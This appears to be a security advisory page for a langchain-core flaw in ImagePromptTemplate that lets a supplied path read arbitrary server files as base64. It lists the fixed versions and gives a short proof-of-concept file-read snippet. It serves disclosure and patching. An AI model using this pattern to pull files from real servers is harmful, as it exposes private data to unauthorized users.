In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade langchain-core
to version 0.1.53, 0.2.43, 0.3.15 or higher.
langchain-core is a Building applications with LLMs through composability
Affected versions of this package are vulnerable to Exposure of Sensitive System Information to an Unauthorized Control Sphere in the ImagePromptTemplate
in image.py
, which can be instantiated with input variables that can contains paths exposing files from the underlying filesystem. The output of the prompt template may be exposed to the model and subsequently the unauthorized user.
from langchain_core.prompts import ChatPromptTemplate, HumanMessagePromptTemplate
prompt = ChatPromptTemplate([
HumanMessagePromptTemplate.from_template([{"type": "image_url", "image_url": {"path": "{image_path}"}}])
])
# input any file path. note it does not need to be an image file.
prompt.invoke({"image_path": "/path/to/private/file/on/server.xyz"})
# output contains base64 encoded str contents of the file
# -> ChatPromptValue(messages=[HumanMessage(content=[{"type": "image_url", "image_url": {"url": "data:{mime_type...};base64,{encoding...}"}])])
# # using with a model
from langchain.chat_models import init_chat_model
llm = init_chat_model("gpt-4o-mini")
chain = prompt | llm
# note the file does need to be an image for the model to respond
chain.invoke({"image_path": "/path/to/private/file/on/server.jpg"})